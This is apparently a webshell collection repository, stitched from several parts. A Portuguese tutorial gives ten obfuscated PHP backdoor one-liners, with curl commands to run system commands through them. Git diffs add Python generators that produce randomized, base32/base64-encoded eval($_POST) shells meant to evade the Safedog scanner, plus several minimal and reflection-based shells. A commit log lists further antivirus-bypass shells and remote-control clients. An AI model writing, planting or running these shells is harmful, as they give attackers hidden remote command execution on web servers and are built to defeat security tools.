 - Concatenação de functions nativas & definição de variáveis.
 - base64_decode - encode(data) , bin2hex , error_reporting(0)
 - Use requests (get or post) que já existam no sistema;
 - Estude a criação de propriedades maliciosas em class’s do sistema, crie suas functions; 
 - Manuseio de valores da variável global $_SERVER;
 - Estude métodos de infeção para arquivos CMS’s feitos em PHP;
 #### Vamos para os exemplos
 **EXEMPLO 01**
 Functions:
 1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
 2. [BASE64_DECODE](http://php.net/manual/pt_BR/function.base64-decode.php)
 3. [DEFINE](http://php.net/manual/pt_BR/function.define.php)
 4. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
 5. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
 Variáveis: c3lzdGVt=system ,dW5hbWUgLWE7bHM7=uname -a;ls; ,aWQ==id
 **CODE:**
 ```
 (error_reporting(0).($__=@base64_decode("c3lzdGVt")).$__(base64_decode("aWQ="))
 .define("_","dW5hbWUgLWE7bHM7").$__(base64_decode(_)).exit);
 ```
 Execução: curl -v 'http://localhost/shell.php'
 **EXEMPLO 02**
 Functions:
 1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
 2. [BASE64_DECODE](http://php.net/manual/pt_BR/function.base64-decode.php)
 3. [ISSET](http://php.net/manual/pt_BR/function.isset.php)
 4. [PRINT](http://php.net/manual/pt_BR/function.print.php)
 5. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
 6. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
 Variáveis: c3lzdGVt=system
 **CODE:**
 ```
 (error_reporting(0).($__=@base64_decode("c3lzdGVt"))
 .print($__(isset($_REQUEST[0])?$_REQUEST[0]:NULL)).exit);
 ```
 Execução: curl -v 'http://localhost/shell.php?0=id'
 **
 ****EXEMPLO 03**Functions:
 1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
 2. [BASE64_DECODE](http://php.net/manual/pt_BR/function.base64-decode.php)
 3. [CREATE_FUNCTION](http://php.net/manual/pt_BR/function.create-function.php) - Cria uma função anônima (lambda-style)
 4. [SHELL_EXEC](http://php.net/manual/pt_BR/function.shell-exec.php)
 5. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
 Variáveis: ZWNobyhzaGVsbF9leGVjKCRfKSk7=echo(shell_exec($_));
 **CODE:**
 ```
 (error_reporting(0)).($_=$_REQUEST[0])
 .($__=@create_function('$_',base64_decode("ZWNobyhzaGVsbF9leGVjKCRfKSk7"))).($__($_).exit);
 ```
 Execução: curl -v 'http://localhost/shell.php?0=id'
 **EXEMPLO 04**
 Functions:
 1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
 2. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
 3. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
 Variáveis: $_GET[1]=Nome da function, $_GET[2]=comando que será executado
 **CODE:**
 ```
 (error_reporting(0).($_=@$_GET[1]).($_($_GET[2])).exit);
 ```
 Execução: curl -v 'http://localhost/shell.php?1=system&2=id;uname' **EXEMPLO 05** Functions:
 1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
 2. [EXTRACT](http://php.net/manual/pt_BR/function.extract.php)
 3. [GET_DEFINED_VARS](http://php.net/manual/pt_BR/function.get-defined-vars.php)
 4. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
 5. [DEFINE](http://php.net/manual/pt_BR/function.define.php)
 6. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
 Variáveis: $_REQUEST[1]=Nome da function, $_REQUEST[2]=comando que será executado **CODE:**
 ```
 (error_reporting(0)).(extract($_REQUEST, EXTR_PREFIX_ALL))
 .($_=@get_defined_vars()['_REQUEST']).(define('_',$_[2])).(($_[1](_))).exit;
 ```
 Execução: curl -v 'http://localhost/shell.php?1=system&2=id;uname'
 ```
 ```
 **EXEMPLO 06**
 Functions:
 1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
 2. [EXPLODE](http://php.net/manual/pt_BR/function.explode.php)
 3. [BASE64_DECODE](http://php.net/manual/pt_BR/function.base64-decode.php)
 4. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
 5. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
 Variáveis: SFRUUF9VU0VSX0FHRU5U=HTTP_USER_AGENT
 **CODE:**
 ```
 (error_reporting(0)).($_=@explode(',',$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]))
 .($_[0]("{$_[1]}")).exit; 
 ```
 Execução: curl -v 'http://localhost/shell.php' --user-agent 'system,id;ls -la'
 ```
 ```
 **EXEMPLO 07**
 Functions:
 1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
 2. [GET_DEFINED_VARS](http://php.net/manual/pt_BR/function.get-defined-vars.php)
 3. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
 4. [VARIABLE SHELLCODE](https://pt.wikipedia.org/wiki/Shellcode)
 5. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
 6. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
 Variáveis: \x30=0, \x73=s, \x79=y , \x73=s, \x74=t, \x65=e, \x6D=m
 **CODE:**
 ```
 (error_reporting(0)).($_[0][]=@$_GET["\x30"])
 .($_[1][] = "\x73").($_[1][] = "\x79").($_[1][] = "\x73")
 .($_[1][] = "\x74").($_[1][] = "\x65").($_[1][] = "\x6D")
 .($__=@get_defined_vars()['_'][1]).($___.=$__[0])
 .($___.=$__[1]).($___.=$__[2]).($___.=$__[3])
 .($___.=$__[4]).($___.=$__[5]).(($___("{$_[0][0]}")).exit);
 ```
 Execução: curl -v 'http://localhost/shell.php?0=id;uname%20-a'
 **EXEMPLO 08**
 Functions:
 1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
 2. [STR_REPLACE](http://php.net/manual/pt_BR/function.str-replace.php)
 3. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
 Variáveis: $_REQUEST[0]=Comando que será executado
 **CODE:**
 ```
 (error_reporting(0)).(str_replace(['$','@','#'],''
 ,'s$##y@#$@#$@#$@s$#$@#$@#$@$te$#@#$m')).($_("{$_REQUEST[0]}"));
 ```
 Execução: curl -v 'http://localhost/shell.php?0=id
 ```
 ```
 **
 ****EXEMPLO 09**
 Functions:
 1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
 2. [STR_REPLACE](http://php.net/manual/pt_BR/function.str-replace.php)
 3. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
 4. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
 Variáveis: $_POST['shellrox']=Comando que será executado
 **CODE:**
 ```
 (error_reporting(0)).($_=[("\x73\x79").("\x73")
 .("\x74\x65\x6d"),"\x73\x68\x65\x6c","\x6c\x72\x6f\x78"])
 .($_[0]($_POST[$_[1].$_[2]]));
 ```
 Execução: curl -d "shellrox=id;uname -a" -X POST 'http://localhost/shell.php'
 ```
 ```
 **
 ****EXEMPLO 10** Functions:
 1. [NON ALPHA NUMERIC](http://www.thespanner.co.uk/2012/08/21/php-nonalpha-tutorial/)
 2. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
 3. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
 **CODE:**
 ```
 $_="";      # we need a blank string to start
 $_[+$_]++;  # access part of the string to convert to an array
 $_=$_."";   # convert the array into a string of "Array"
 $_=$_[+""]; # access the 0 index of the string "Array" which is "A"
 # INCREMENTANDO VALORES PARA ACHAR AS LETRAS
 # NO CASO QUERO MONTAR A STRING SYSTEM
 ($_++); #A
 ($_++); #B
 ($_++); #C
 ($_++); #D
 # PRIMEIRA LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO
 ($___[]=$_++);#E
 ($_++); #F
 ($_++); #G
 ($_++); #H
 ($_++); #I
 ($_++); #J
 ($_++); #K
 ($_++); #L
 ```
 `# LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO` ($___[]=$_++);#M
 ```
 ($_++); #N
 ($_++); #O
 ($_++); #P
 ($_++); #Q
 ($_++); #R
 ```
 `# LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO` ($___[]=$_++);#S
 `# LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO` ($___[]=$_++);#T
 ```
 ($_++); #U
 ($_++); #V
 ($_++); #W
 ($_++); #X
 ```
 `# LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO` ($___[]=$_++);#Y
 ```
 ($_++);#Z
 # DEBUG DO ARRAY:
 /* Array
 (
    [0] => E
    [1] => M
    [2] => S
    [3] => T
    [4] => Y
 )
 */
 # MONTAR STRING COM OS CAMPOS DO ARRAY $___  
 $_____=$___[2].$___[4].$___[2].$___[3].$___[0].$___[1];
 # USANDO TÉCNICA DE FUNCTION ANONIMA PARA EXECUÇÃO
 $_____('id;uname -a');
 VERSÃO MINIMALISTA:
 ($_="").($_[+$_]++).($_=$_."").($_=$_[+""]).($_++)
 .($_++).($_++).($_++).($___[]=$_++).($_++).($_++)
 .($_++).($_++).($_++).($_++).($_++).($___[]=$_++)
 .($_++).($_++).($_++).($_++).($_++).($___[]=$_++)
 .($___[]=$_++).($_++).($_++).($_++).($_++)
 .($___[]=$_++).($_++)
 .($_____=$___[2].$___[4].$___[2].$___[3].$___[0].$___[1])
 .($_____('id;uname -a'));
 ```
 Execução: curl -v 'http://localhost/shell.php'
 #### Observação: Existem outras milhares de técnicas, e tentarei fazer outros posts sobre.
 #### Referências
 - http://php.net/manual/en/language.operators.execution.php#language.operators.execution
 - https://thehackerblog.com/a-look-into-creating-a-truley-invisible-php-shell
 - http://www.businessinfo.co.uk/labs/talk/Nonalpha.pdf
 - http://php.net/manual/pt_BR/function.create-function.php
 - https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html
 - http://web.archive.org/web/20120427221212/http://h.ackack.net/tiny-php-shell.html
 - http://php.net/manual/pt_BR/function.extract.php
 - http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
 - https://www.akamai.com/cn/zh/multimedia/documents/report/akamai-security-advisory-web-shells-backdoor-trojans-and-rats.pdf
 - https://aw-snap.info/articles/backdoor-examples.php
 - http://php.net/manual/pt_BR/reserved.variables.server.php
 - http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/
 - https://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
 - http://php.net/manual/en/functions.variable-functions.php
 - http://php.net/manual/pt_BR/function.exec.php
 - http://php.net/manual/pt_BR/function.shell-exec.php
 - http://php.net/manual/pt_BR/function.system.php
 - http://php.net/manual/pt_BR/function.passthru.php
 - http://php.net/manual/pt_BR/function.get-defined-vars.php
 - http://php.net/manual/pt_BR/function.extract.php
--- a/php/create_code_with_xor.py
+++ b/php/create_code_with_xor.py
@@ -0,0 +1,59 @@
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 # name: yihuo.py
 # http://www.opensource.org/licenses/mit-license
 # MIT License
 # from: https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
 # Copyright (c) 2020 
 # 
 # Permission is hereby granted, free of charge, to any person obtaining a copy
 # of this software and associated documentation files (the "Software"), to deal
 # in the Software without restriction, including without limitation the rights
 # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 # copies of the Software, and to permit persons to whom the Software is
 # furnished to do so, subject to the following conditions:
 # 
 # The above copyright notice and this permission notice shall be included in all
 # copies or substantial portions of the Software.
 # 
 # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
 # SOFTWARE.
 import string
 from urllib.parse import quote
 keys = list(range(65)) + list(range(91, 97)) + list(range(123, 127))
 results = []
 for i in keys:
    for j in keys:
        asscii_number = i ^ j
        if (asscii_number >= 65 and asscii_number <= 90) or (asscii_number >= 97 and asscii_number <= 122):
            if i < 32 and j < 32:
                temp = (
                f'{chr(asscii_number)} = ascii:{i} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
                results.append(temp)
            elif i < 32 and j >= 32:
                temp = (
                f'{chr(asscii_number)} = ascii:{i} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
                results.append(temp)
            elif i >= 32 and j < 32:
                temp = (
                f'{chr(asscii_number)} = {chr(i)} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
                results.append(temp)
            else:
                temp = (f'{chr(asscii_number)} = {chr(i)} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
                results.append(temp)
                results.sort(key=lambda x: x[1], reverse=False)
                for low_case in string.ascii_lowercase:
                    for result in results:
                        if low_case in result:
                            print(result[0])
                            for upper_case in string.ascii_uppercase:
                                for result in results:
                                    if upper_case in result:
                                        print(result[0])
--- a/php/create_webshell_with_py.py
+++ b/php/create_webshell_with_py.py
@@ -0,0 +1,81 @@
 import random
 #author: pureqh
 #github: https://github.com/pureqh/webshell
 #use:GET:http://url?pass=pureqh POST:zero
 shell = '''<?php
 class {0}{1}
        public ${2} = null;
        public ${3} = null;
        function __construct(){1}
            if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
        $this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
        $this->{3} = @{9}($this->{2});
        @eval({5}.$this->{3}.{5});
        {4}{4}{4}
 new {0}();
 function {6}(${7}){1}
    $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
    ${8} = '';
    $v = 0;
    $vbits = 0;
    for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
    $v <<= 8;
        $v += ord(${7}[$i]);
        $vbits += 8;
        while ($vbits >= 5) {1}
            $vbits -= 5;
            ${8} .= $BASE32_ALPHABET[$v >> $vbits];
            $v &= ((1 << $vbits) - 1);{4}{4}
    if ($vbits > 0){1}
        $v <<= (5 - $vbits);
        ${8} .= $BASE32_ALPHABET[$v];{4}
    return ${8};{4}
 function {9}(${7}){1}
    ${8} = '';
    $v = 0;
    $vbits = 0;
    for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
        $v <<= 5;
        if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
            $v += (ord(${7}[$i]) - 97);
        {4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
            $v += (24 + ${7}[$i]);
        {4} else {1}
            exit(1);
        {4}
        $vbits += 5;
        while ($vbits >= 8){1}
            $vbits -= 8;
            ${8} .= chr($v >> $vbits);
            $v &= ((1 << $vbits) - 1);{4}{4}
    return ${8};{4}
 ?>'''
 def random_keys(len):
    str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    return ''.join(random.sample(str,len))
 def random_name(len):
    str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    return ''.join(random.sample(str,len))  
 def build_webshell():
    className = random_name(4)
    lef = '''{'''
    parameter1 = random_name(4)
    parameter2 = random_name(4)
    rig = '''}'''
    disrupt = "\"/*"+random_keys(7)+"*/\""
    fun1 = random_name(4)
    fun1_vul = random_name(4)
    fun1_ret = random_name(4)
    fun2 = random_name(4)
    shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
    return shellc
 if __name__ == '__main__':
    print (build_webshell())
--- a/php/get1.php
+++ b/php/get1.php
@@ -0,0 +1 @@
 <?=`$_GET[C]`?>
--- a/php/getConstants.php
+++ b/php/getConstants.php
@@ -0,0 +1,27 @@
 <?php
 class Test
 {
    const a = 'As';
    const b = 'se';
    const c = 'rt';
    public function __construct()
    {
    }
 }
 $para1;
 $para2;
 $reflector = new ReflectionClass('Test');
 for ($i=97; $i <= 99; $i++) {
    $para1 = $reflector->getConstant(chr($i));
    $para2.=$para1;
 }
 foreach (array('_POST','_GET') as $_request) {
    foreach ($$_request as $_key=>$_value) {
        $$_key=  $_value;
    }
 }
 $para2($_value);
--- a/php/getConstants2.php
+++ b/php/getConstants2.php
@@ -0,0 +1,24 @@
 <?php
 class Test
 {
    const a = array(1=>'aS',2=>'se',3=>'rT');
    public function __construct()
    {
    }
 }
 $refl = new ReflectionClass('Test');
 foreach ($refl->getConstants() as $key => $value) {
    foreach ($value as $key => $value1) {
        $value2.=$value1;
    }
 }
 foreach (array('_POST','_GET') as $_request) {
    foreach ($$_request as $_key=>$_value) {
        $$_key=  $_value;
    }
 }
 $value2($_value);
--- a/php/php_webshell.py
+++ b/php/php_webshell.py
@@ -0,0 +1,43 @@
 import random
 #author: pureqh
 #github: https://github.com/pureqh/webshell
 shell = '''<?php 
 class {0}{3}
        public ${1} = null;
        public ${2} = null;
        public ${6} = null;
        function __construct(){3}
        $this->{1} = 'ZXZhbCgkX1BPU';
        $this->{6} = '1RbYV0pOw==';
        $this->{2} = @base64_decode($this->{1}.$this->{6});
        @eval({5}.$this->{2}.{5});
        {4}{4}
 new {0}();
 ?>'''
 def random_keys(len):
    str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    return ''.join(random.sample(str,len))
 def random_name(len):
    str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    return ''.join(random.sample(str,len))   
 def build_webshell():
    className = random_name(4)
    parameter1 = random_name(5)
    parameter2 = random_name(6)
    lef = '''{'''
    rig = '''}'''
    disrupt = "\"/*"+random_keys(7)+"*/\""
    parameter3 = random_name(6)
    shellc = shell.format(className,parameter1,parameter2,lef,rig,disrupt,parameter3)
    return shellc
 if __name__ == '__main__':
    print (build_webshell())
--- a/php/webshell-without-alphanumeric2.php
+++ b/php/webshell-without-alphanumeric2.php
@@ -0,0 +1 @@
 <?=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);
--- a/tanjiti/webshellSample
+++ b/tanjiti/webshellSample
--- a/tdifg/WebShell
+++ b/tdifg/WebShell
--- a/threedr3am/JSP-Webshells
+++ b/threedr3am/JSP-Webshells
--- a/vnhacker1337/Webshell
+++ b/vnhacker1337/Webshell
--- a/webshellpub/awsome-webshell
+++ b/webshellpub/awsome-webshell
--- a/xl7dev/WebShell
+++ b/xl7dev/WebShell
--- a/ysrc/webshell-sample
+++ b/ysrc/webshell-sample
Author	SHA1	Message	Date
tennc	9da9029fb0	Update README.md	2021-01-04 21:55:41 +08:00
tennc	8e77847595	add create_webshell_with_py.py @pureqh ：💯 Create webshell from：https://mp.weixin.qq.com/s/s0piu9qU8oq6M1qAZCyI4g github： https://github.com/pureqh/webshell author: pureqh	2021-01-04 21:54:14 +08:00
tennc	b59b949389	Create bypass-with-base32.php	2021-01-04 21:50:18 +08:00
tennc	eafae576c9	Create bypass2021-01-04-01.php from https://mp.weixin.qq.com/s/s0piu9qU8oq6M1qAZCyI4g	2021-01-04 21:47:58 +08:00
tennc	a6546d03ee	Create getConstants2.php use: xxx/webshell/1?<>=system(whoami) from : https://xz.aliyun.com/t/8684	2020-12-28 22:15:54 +08:00
tennc	fd35f195c1	Create getConstants.php use: xxxxxx/getConstants?1=phpinfo() from : https://xz.aliyun.com/t/8684	2020-12-28 01:08:19 +08:00
tennc	b66c3bb616	add YXNzZXJ0YWE.php bypass 啊D from: https://xz.aliyun.com/t/8684	2020-12-28 01:05:10 +08:00
tennc	c9755402a6	add Webshell免杀的思考与学习.mhtml from : https://xz.aliyun.com/t/8684 author: Isabellae	2020-12-28 01:02:49 +08:00
tennc	c7c6b39833	Create shell2020-12-06.php password:rebeyond	2020-12-07 23:05:11 +08:00
tennc	f875e7b780	Create Shu1337.php from: https://github.com/linuxsec/shu-shell @linuxsec 👍	2020-11-18 22:20:42 +08:00
tennc	da33d92ba8	Update README_EN.md	2020-11-08 20:43:01 +08:00
tennc	9ef78d3996	Update README.md	2020-11-08 20:42:38 +08:00
tennc	9495a6c59e	Rename README_ZH.md to README.md	2020-11-08 20:40:40 +08:00
tennc	0266c30801	Rename README.md to README_EN.md	2020-11-08 20:40:19 +08:00
tennc	9f63d98db5	Update README.md	2020-11-08 20:32:41 +08:00
tennc	e467712762	Create README_ZH.md add README_ZH.md	2020-11-08 20:30:54 +08:00
tennc	3ffc1b6312	Merge pull request #40 from rubo77/patch-1 Reame: translate to english	2020-11-08 20:23:40 +08:00
Ruben Barkow-Kuder	fc276c0bb0	Reame: translate to english I used mainly Google translate, so I could have gotten some things wrong, please use this as a first stept to translate your Readme into english. you could leave the original as `Readme_zn.md` if you like	2020-11-07 14:27:28 +01:00
tennc	e9b09f671b	Merge pull request #38 from RobinvandenHurk/patch-1 Fixed label	2020-10-22 23:26:08 +08:00
Robin van den Hurk	acb55c61bb	Fixed label	2020-10-13 14:46:48 +02:00
tennc	7e6629ab49	Update README.md	2020-10-11 19:15:53 +08:00
tennc	7105ac90a5	Create get1.php use: "`****`" from: `19e3e0ab25` @thephenix4 👍	2020-10-11 19:11:12 +08:00
tennc	976ca14a7d	Create webshell-without-alphanumeric2.php what ？？ from: `3ea2d589ae` @oktavandi 👍	2020-10-11 19:07:02 +08:00
tennc	823aa6ff59	add 冰蝎，从入门到魔改.pdf	2020-10-06 12:55:18 +08:00
tennc	67468c8243	add 冰蝎，从入门到魔改（续）.pdf	2020-10-06 12:49:49 +08:00
tennc	df832d0366	Create cotent01.md from : https://blog.mrcl0wn.com/2019/01/hold-door-hold-backdoor-php.html	2020-09-22 13:06:26 +08:00
tennc	dd21bebfc0	add some submodule webshell project to this project	2020-09-14 13:32:03 +08:00
tennc	25f1dc52ce	Update README.md	2020-09-14 13:07:25 +08:00
tennc	222fc05087	Update README.md	2020-09-14 13:04:36 +08:00
tennc	ce94519fd0	Update README.md add some project webshell link	2020-09-14 13:03:43 +08:00
tennc	31c6b56f25	Update other shell repository.md	2020-09-07 23:30:54 +08:00
tennc	5f3741952d	Update and rename other shell repository to other shell repository.md	2020-09-07 23:30:07 +08:00
tennc	43d9582172	Create php_webshell.py create bypass safedog webshell with python from : https://github.com/pureqh/webshell thanks to pureqh 👍	2020-09-05 17:44:37 +08:00
tennc	0da00dfca4	add php马-bypass _ alin'Blog.pdf from : http://alin.run/2020/08/04/php-webshell-bypass/	2020-09-03 21:08:06 +08:00
tennc	719eb9131d	Create ass.php 请求时，设置Referer头，后面以”ass****”结尾即可,比如：Referer: http://www.target.com/ass.php。在使用Cknife时，注意软件实现有缺陷，会从第二个”:”处截断，可改成Referer: http%3a//www.target.com/ass.php from : http://alin.run/2020/08/04/php-webshell-bypass/	2020-09-03 21:00:49 +08:00
tennc	9fd273a5a5	Create webshell-detect-bypass from : LandGrey 👍	2020-09-03 20:58:19 +08:00
tennc	aeaf7516dd	add 从Webshell的视角谈攻防对抗.pdf from : https://www.freebuf.com/articles/network/247359.html	2020-09-01 21:06:04 +08:00
tennc	3ab759a148	add Upload与WAF的那些事.pdf from : http://www.0x3.biz/archives/1925.html	2020-09-01 21:01:53 +08:00
tennc	2bea3becb2	Create 2020-08-31-01.php from: https://github.com/clm123321/tongda_oa_rce/blob/master/tongda.py#L145	2020-08-31 21:39:22 +08:00
tennc	a6acc071dd	Delete CNAME	2020-08-30 15:16:02 +08:00
tennc	41e8490caf	Delete CNAME	2020-08-30 15:14:38 +08:00
tennc	1f9390b340	Update CNAME rewrite cname	2020-08-30 15:12:29 +08:00
tennc	e864fcd511	Create create_code_with_xor.py create some code for php xor to bypass safedog from : https://www.sqlsec.com/2020/07/shell.html#toc-heading-24	2020-08-30 14:05:29 +08:00
tennc	105f3ed358	Update README.md add some project web site url	2020-08-29 15:33:12 +08:00
tennc	a83d9cb7e9	Update README.md rewrite	2020-08-29 15:27:36 +08:00
tennc	349039f2d5	Merge pull request #35 from nil0x42/patch-1 Add `phpsploit` (C2 framework via PHP oneliner)	2020-08-29 15:25:06 +08:00
tennc	a09c535f6d	Create bt_yincang_shell.md from: https://mp.weixin.qq.com/s/-8JE1ovWKOorNr6MCAgejg wx_id: 漏洞推送	2020-08-29 14:59:27 +08:00
nil0x42	57d76f059e	Add `phpsploit` (C2 framework via PHP oneliner) Add phpsploit tool (https://github.com/nil0x42/phpsploit): Full-featured C2 framework which silently persists on webserver via evil PHP oneliner, with a complete asrenal of post-exploitation & privesc features Ask me if you have any question 👍	2020-08-26 17:15:11 +00:00
tennc	3fb8abd7c9	Create php_custom_script_for_mysql_fix.php fix php_custom_script_for_mysql_fix.php 乱码	2020-08-26 22:48:48 +08:00
tennc	e458de3dc7	Create python2_custom_script.py add python2_custom_script.py	2020-08-26 22:47:31 +08:00
tennc	efe66a8e7b	Create jspx_custom_script_for_mysql.jspx add jspx_custom_script_for_mysql	2020-08-26 22:46:46 +08:00
tennc	c6f42dd08c	Create jsp_custom_script_for_oracle.jsp add jsp_custom_script_for_oracle.jsp	2020-08-26 22:46:05 +08:00
tennc	eae7182ca9	Create WebLogic_Shiro.md thanks Y4er 👍	2020-08-26 22:37:49 +08:00
tennc	fef331e3f2	add Godzilla-BypassOpenRasp.jar add Godzilla-BypassOpenRasp.jar	2020-08-25 20:31:48 +08:00
tennc	cd55a03046	add WebShell免杀.pdf add WebShell免杀.pdf	2020-08-22 19:33:50 +08:00
tennc	61b8a65a49	add 1个经典的过人 WebShell.pdf add 1个经典的过人 WebShell.pdf	2020-08-22 19:24:17 +08:00
tennc	5c86bc3410	Create readme.md	2020-08-22 19:23:35 +08:00
tennc	62ccee518b	Create bypass.md	2020-08-22 19:22:26 +08:00
tennc	23aea8530d	Create 2020.08.20.20.php maybe bypass safedog from : https://www.sqlsec.com/2020/07/shell.html#toc-heading-24	2020-08-21 19:52:22 +08:00
tennc	cbd7b8ef98	Create 2020.08.20.19.php bypass by safedog https://www.sqlsec.com/2020/07/shell.html	2020-08-20 13:09:52 +08:00
tennc	12ad35eb0f	Create 2020.08.20.18.php bypass safedog https://www.sqlsec.com/2020/07/shell.html	2020-08-20 13:08:25 +08:00
tennc	0d1874b235	Create 2020.08.20.17.php killed by safedog from : https://www.sqlsec.com/2020/07/shell.html	2020-08-20 13:07:32 +08:00
tennc	cd1e25025a	Create 2020.08.20.16.php from : https://www.sqlsec.com/2020/07/shell.html killed by safedog	2020-08-20 13:03:10 +08:00
tennc	ecc1fb09ee	Create 2020.08.20.15.php use: shell.php?e=mb_eregi_replace post x=phpinfo();	2020-08-20 12:48:04 +08:00
tennc	6a9169da6b	Create 2020.08.20.14.php	2020-08-20 12:40:40 +08:00
tennc	44282fe412	Create 2020.08.20.13.php shell.php?e=preg_replace ==> preg_replace('\|.*\|e',$_POST['x'],'') use: post x=phpinfo(); from: https://www.sqlsec.com/2020/07/shell.html	2020-08-20 12:38:26 +08:00
tennc	aeb2db1e19	Create 2020.08.20.12.php from : https://www.sqlsec.com/2020/07/shell.html	2020-08-20 12:35:58 +08:00
tennc	f7c1551c7f	Create 2020.08.20.11.php from : https://www.sqlsec.com/2020/07/shell.html	2020-08-20 12:34:54 +08:00
tennc	accce9acef	Create 2020.08.20.10.php from : https://www.sqlsec.com/2020/07/shell.html	2020-08-20 12:34:25 +08:00
tennc	63217f585d	Create 2020.08.20.09.php from : https://www.sqlsec.com/2020/07/shell.html	2020-08-20 12:33:34 +08:00
tennc	69b4a7b5bc	Create 2020.08.20.08.php from : https://www.sqlsec.com/2020/07/shell.html	2020-08-20 12:32:56 +08:00
tennc	a700c2b3d8	Create 2020.08.20.07.php from : https://www.sqlsec.com/2020/07/shell.html killled by safedog	2020-08-20 12:32:12 +08:00
tennc	d5f61a9c5f	Create 2020.08.20.06.php from : https://www.sqlsec.com/2020/07/shell.html killed by safedog	2020-08-20 12:31:23 +08:00
tennc	d8cdd62ab1	Create 2020.08.20.05.php from : https://www.sqlsec.com/2020/07/shell.html	2020-08-20 12:30:06 +08:00
tennc	223d57c52c	Create 2020.08.20.04.php from : https://www.sqlsec.com/2020/07/shell.html	2020-08-20 12:29:26 +08:00
tennc	6759fd8dcc	Create 2020.08.20.03.php from : https://www.sqlsec.com/2020/07/shell.html	2020-08-20 12:28:46 +08:00
tennc	51833ad9b6	Create 2020.08.20.02.php from : https://www.sqlsec.com/2020/07/shell.html	2020-08-20 12:27:40 +08:00
tennc	820aadc6a1	Create 2020.08.20.01.php from : https://www.sqlsec.com/2020/07/shell.html	2020-08-20 12:26:04 +08:00
tennc	5a94f3e98b	add Behinder_v3.0_Beta_1.zip	2020-08-19 22:19:34 +08:00
tennc	457530e937	Update README.md	2020-08-19 22:09:48 +08:00
tennc	74b1f33dbe	add Godzilla client	2020-08-19 12:52:10 +08:00
		`@@ -0,0 +1,2 @@`
							`### 1. [一个经典的过人 WebShell by tr0y](https://www.tr0y.wang/2020/07/14/webshell-bypass-human/)`
